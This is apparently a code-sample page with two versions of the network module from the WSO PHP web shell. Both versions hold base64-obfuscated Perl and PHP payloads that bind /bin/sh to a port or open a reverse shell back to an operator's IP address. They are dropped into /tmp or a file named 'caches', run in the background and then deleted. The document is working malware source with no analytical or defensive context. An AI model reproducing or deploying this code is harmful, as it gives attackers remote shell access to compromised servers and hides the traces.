function actionNetwork()
{
    wsoHeader();
    $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo "<h1>Network tools</h1><div class=content> \n  \n    <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> \n    <span>Bind port to /bin/sh [perl]</span><br/> \n    Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n    </form> \n    <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> \n    <span>Back-connect  [perl]</span><br/> \n    Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n  \n    </form><br>";
    if (isset($_POST['p1'])) {
        function cf($f, $t)
        {
            $w = @fopen($f, "w") or @function_exists('file_put_contents');
            if ($w) {
                @fwrite($w, @base64_decode($t));
                @fclose($w);
            }
        }
        if ($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl", $bind_port_p);
            $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
            unlink("/tmp/bp.pl");
        }
        if ($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl", $back_connect_p);
            $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
            unlink("/tmp/bc.pl");
        }
    }
    echo '</div>';
    wsoFooter();
}
Ejemplo n.º 2
0
function actionNetwork()
{
    wsoHeader();
    $back_connect_perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkg" . "fHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFk" . "ZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7" . "DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVy" . "cm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxu" . "Iik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN" . "Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2Uo" . "U1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $back_connect_tty_perl = "IyEvdXNyL2Jpbi9wZXJsIC13DQp1c2UgSU86OlNvY2tldDsNCnVzZSBGY250bDsNCiRUSU9DR1BU" . "TiA9IC0yMTQ3MTk5OTUyOyRUSU9DU1BUTENLID0gMTA3NDAyNTUyMTskRUFHQUlOPTExOyRIT1NU" . "PSRBUkdWWzBdOyRQT1JUPSRBUkdWWzFdOyQwPSJhcGFjaGUiOw0KJHNvY2sgPSBuZXcgSU86OlNv" . "Y2tldDo6SU5FVCAoUGVlckFkZHIgPT4gJEhPU1QsUGVlclBvcnQgPT4gJFBPUlQsUHJvdG8gPT4g" . "J3RjcCcsQmxvY2tpbmcgPT4gMCwpIG9yIGRpZSAkITsNCnN5c29wZW4gKFBUTVgsICcvZGV2L3B0" . "bXgnLCBPX1JEV1J8T19OT05CTE9DSykgb3IgZGllICQhOyR0bXA9Jyc7aW9jdGwgKFBUTVgsICRU" . "SU9DR1BUTiwgJHRtcCkgb3IgZGllICQhOw0KJHB0cyA9IHVucGFjaygnaScsICR0bXApOyR1bmxv" . "Y2s9cGFjaygnaScsIDApO2lvY3RsKFBUTVgsICRUSU9DU1BUTENLLCAkdW5sb2NrKSBvciBkaWUg" . "JCE7Y2hkaXIgJy8nIG9yIGRpZSAkITsNCm9wZW4gU1RESU4sICcvZGV2L251bGwnIG9yIGRpZSAk" . "ITt1bWFzayAwO2RlZmluZWQoJHBpZCA9IGZvcmspIG9yIGRpZSAkITtleGl0IGlmICRwaWQ7ZGVm" . "aW5lZCgkcGlkID0gZm9yaykgb3IgZGllICQhOw0KaWYoISRwaWQpe2V4ZWMoIi9zYmluL2dldHR5" . "IC1uIC1sIC9iaW4vYmFzaCAzODQwMCAvZGV2L3B0cy8kcHRzIikgb3IgZXhlYygiL2Jpbi9iYXNo" . "IDwvZGV2L3B0cy8kcHRzID4vZGV2L3B0cy8kcHRzIDI+L2Rldi9wdHMvJHB0cyIpIG9yIGRpZSAk" . "ITsNCmV4aXQ7fW9wZW4gU1RET1VULCAnPj4vZGV2L251bGwnIG9yIGRpZSAkITtvcGVuIFNUREVS" . "UiwgJz4+L2Rldi9udWxsJyBvciBkaWUgJCE7JHBwID0gUFRNWDskcmluPSR3aW49JGVpbj0nJzsN" . "CnZlYygkcmluLGZpbGVubygkcHApLDEpID0xO3ZlYygkcmluLGZpbGVubygkc29jayksMSkgPSAx" . "O3NlbGVjdCAkc29jazskfD0xO3NlbGVjdCBQVE1YOyR8PTE7c2VsZWN0IFNURE9VVDsNCiR8PTE7" . "JGZpbmlzaGVkPTA7c3ViIGZvcndhcmRkYXRhIHtteSAoJGZyb20sJHRvKSA9IEBfO3doaWxlKDEp" . "IHskcnYgPSBzeXNyZWFkKCRmcm9tLCAkYnVmZiwgMTAyNCk7DQpsYXN0IGlmICghZGVmaW5lZCgk" . "cnYpICYmICQhID09ICRFQUdBSU4pO2RlZmluZWQoJHJ2KSBvciBkaWUgJCE7aWYgKCRydiA9PSAw" . "KSB7ICRmaW5pc2hlZCA9IDE7IGxhc3Q7fQ0Kd2hpbGUobGVuZ3RoICRidWZmID4gMCkgeyRydiA9" . "IHN5c3dyaXRlKCR0bywgJGJ1ZmYsIGxlbmd0aCAkYnVmZik7aWYgKCFkZWZpbmVkKCRydikgJiYg" . "JCEgPT0gJEVBR0FJTikge25leHQ7fQ0KZGVmaW5lZCgkcnYpIG9yIGRpZSAkITtsYXN0IGlmICgk" . "cnYgPT0gbGVuZ3RoICRidWZmKTtzdWJzdHIoJGJ1ZmYsMCwkcnYpID0gJyc7fX19d2hpbGUoISAk" . "ZmluaXNoZWQpIHsNCiRuZm91bmQgPSBzZWxlY3QoJHJvdXQ9JHJpbiwgJHdvdXQ9JHdpbiwgJGVv" . "dXQ9JGVpbiwgdW5kZWYpO2RpZSAkISBpZiAoJG5mb3VuZCA9PSAtMSk7Zm9yd2FyZGRhdGEoJHBw" . "LCRzb2NrKTsNCmxhc3QgaWYgJGZpbmlzaGVkO2ZvcndhcmRkYXRhKCRzb2NrLCRwcCk7bGFzdCBp" . "ZiAkZmluaXNoZWQ7fWNsb3NlIFBUTVg7Y2xvc2UgJHNvY2s7JHdvdXQ9JGVvdXQuJHdvdXQuJHJv" . "dXQ7";
    $back_connect_php = "PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KJGlwID0gJGFyZ3ZbMV07JHBvcnQgPSAkYXJndlsy" . "XTskc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzskY2h1bmtfc2l6ZSA9IDE0" . "MDA7JHdyaXRlX2EgPSBudWxsOw0KJGVycm9yX2EgPSBudWxsOyRkYWVtb24gPSAwOyRkZWJ1ZyA9" . "IDA7DQppZihmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSl7JHBpZCA9IHBjbnRsX2Zvcmsg" . "KCk7aWYoJHBpZCA9PSAtMSl7cHJpbnRpdCAoJ0VSUk9SOiBDYW5cJ3QgZm9yaycpO2V4aXQoMSk7" . "fQ0KaWYoJHBpZCl7ZXhpdCgwKTt9aWYocG9zaXhfc2V0c2lkICgpID09IC0xKXtwcmludGl0KCdF" . "cnJvcjogQ2FuXCd0IHNldHNpZCgpJyk7ZXhpdCgxKTt9JGRhZW1vbiA9IDE7DQp9ZWxzZXtwcmlu" . "dGl0KCdXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiBUaGlzIGlzIHF1aXRlIGNvbW1vbiBh" . "bmQgbm90IGZhdGFsLicpO30NCmNoZGlyICgnLycpOw0KdW1hc2sgKDApOw0KJHNvY2sgPSBmc29j" . "a29wZW4gKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgew0K" . "cHJpbnRpdCAoInskZXJyc3RyfSAoeyRlcnJub30pIik7DQpleGl0KDEpOw0KfQ0KJGRlc2NyaXB0" . "b3JzcGVjID0gYXJyYXkgKDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLA0KICAgICAgICAgICAgICAg" . "ICAgICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksDQogICAgICAgICAgICAgICAgICAgICAyID0+" . "IGFycmF5KCJwaXBlIiwgInciKSk7DQokcHJvY2VzcyA9IHByb2Nfb3BlbiAoJHNoZWxsLCAkZGVz" . "Y3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlICgkcHJvY2Vzcykpew0KcHJp" . "bnRpdCAoJ0VSUk9SOiBDYW5cJ3Qgc3Bhd24gc2hlbGwnKTsNCmV4aXQgKDEpOw0KfQ0Kc3RyZWFt" . "X3NldF9ibG9ja2luZyAoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcgKCRwaXBl" . "c1sxXSwgMCk7DQpzdHJlYW1fc2V0X2Jsb2NraW5nICgkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3Nl" . "dF9ibG9ja2luZyAoJHNvY2ssIDApOw0KcHJpbnRpdCAoJ1N1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2" . "ZXJzZSBzaGVsbCB0byAnIC4gJGlwIC4gJzonIC4gJHBvcnQpOw0Kd2hpbGUgKDEpIHsNCmlmKGZl" . "b2YgKCRzb2NrKSl7DQogIHByaW50aXQgKCdFUlJPUjogU2hlbGwgY29ubmVjdGlvbiB0ZXJtaW5h" . "dGVkJyk7DQogIGJyZWFrOw0KfQ0KaWYoZmVvZiAoJHBpcGVzWzFdKSl7DQogICBwcmludGl0ICgn" . "RVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCcpOw0KICAgYnJlYWs7DQp9DQokcmVhZF9h" . "ID0gYXJyYXkgKCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29j" . "a2V0cyA9IHN0cmVhbV9zZWxlY3QgKCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7" . "DQppZihpbl9hcnJheSAoJHNvY2ssICRyZWFkX2EpKXsNCiAgaWYgKCRkZWJ1ZykgcHJpbnRpdCAo" . "J1NPQ0sgUkVBRCcpOw0KICAkaW5wdXQgPSBmcmVhZCAoJHNvY2ssICRjaHVua19zaXplKTsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NPQ0s6ICcgLiAkaW5wdXQpOw0KICBmd3JpdGUgKCRwaXBl" . "c1swXSwgJGlucHV0KTsNCn0NCmlmKGluX2FycmF5ICgkcGlwZXNbMV0sICRyZWFkX2EpKXsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NURE9VVCBSRUFEJyk7DQogICRpbnB1dCA9IGZyZWFkKCRw" . "aXBlc1sxXSwgJGNodW5rX3NpemUpOw0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERPVVQ6ICcg" . "LiAkaW5wdXQpOw0KICBmd3JpdGUgKCRzb2NrLCAkaW5wdXQpOw0KfQ0KaWYoaW5fYXJyYXkgKCRw" . "aXBlc1syXSwgJHJlYWRfYSkpew0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERFUlIgUkVBRCcp" . "Ow0KICAkaW5wdXQgPSBmcmVhZCAoJHBpcGVzWzJdLCAkY2h1bmtfc2l6ZSk7DQogIGlmICgkZGVi" . "dWcpIHByaW50aXQoJ1NUREVSUjogJyAuICRpbnB1dCk7DQogIGZ3cml0ZSAoJHNvY2ssICRpbnB1" . "dCk7DQp9DQp9DQpmY2xvc2UgKCRzb2NrKTsNCmZjbG9zZSAoJHBpcGVzWzBdKTsNCmZjbG9zZSAo" . "JHBpcGVzWzFdKTsNCmZjbG9zZSAoJHBpcGVzWzJdKTsNCnByb2NfY2xvc2UgKCRwcm9jZXNzKTsN" . "CmZ1bmN0aW9uIHByaW50aXQoJHN0cmluZyl7aWYoISRkYWVtb24pe3ByaW50ICJ7JHN0cmluZ31c" . "biI7fX0NCj8+IA==";
    $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBl" . "eGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdld" . "HByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2" . "Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEF" . "SR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywz" . "KSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sU" . "yk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZC" . "AkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQo" . "JCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAi" . "Q2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='443'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g2(null,null,'bcp',this.server.value,this.port.value,this.bcpath.value,this.bctype.value);return false;\"><br>\r\n\t<span>Back-connect</span><br/>\r\n\t<table cellpadding='1' cellspacing='0' width='50%'>\r\n\t<tr><td>Type:</td><td><select name='bctype'><option value='1' >Perl</option><option value='2' >TTY Perl</option><option value='3'>PHP</option></select></td></tr>\r\n\t<tr><td width='1%'>Path:</td><td><input type='text' id='bcpath' name='bcpath' value='/tmp/'> <a href='#' onClick=\"document.getElementById('bcpath').value='" . $_POST['c'] . "'\">or this path</a></td></tr>\r\n\t<tr><td>Server:</td><td><input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "' size='15'>:<input type='text' name='port' value='443' size='4'></td></tr><tr><td><input type=submit value='>>'></td></tr>\r\n\t</table></form><br>";
    if (isset($_POST['p1'])) {
        function cf($f, $t)
        {
            $w = @fopen($f, "w") or @function_exists('file_put_contents');
            if ($w) {
                @fwrite($w, @base64_decode($t));
                @fclose($w);
            }
        }
        if ($_POST['p1'] == 'bpp') {
            print_r($_POST);
            exit;
            cf("/tmp/bp.pl", $bind_port_p);
            $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
            unlink("/tmp/bp.pl");
        }
        if ($_POST['p1'] == 'bcp') {
            switch ($_POST['p5']) {
                case 1:
                    $back_connect_p = $back_connect_perl;
                    $l = gphp('perl');
                    break;
                case 2:
                    $back_connect_p = $back_connect_tty_perl;
                    $l = gphp('perl');
                    break;
                case 3:
                    $back_connect_p = $back_connect_php;
                    $l = gphp('php');
                    break;
            }
            $_POST['p4'] = (substr($_POST['p4'], -1, 1) == '/' or substr($_POST['p4'], -1, 1) == '\\') ? trim($_POST['p4']) . 'caches' : trim($_POST['p4']) . '/caches';
            cf($_POST['p4'], $back_connect_p);
            $out = wsoEx($l . " " . $_POST['p4'] . " " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep caches") . "</pre>";
            unlink($_POST['p4']);
        }
    }
    echo '</div>';
    wsoFooter();
}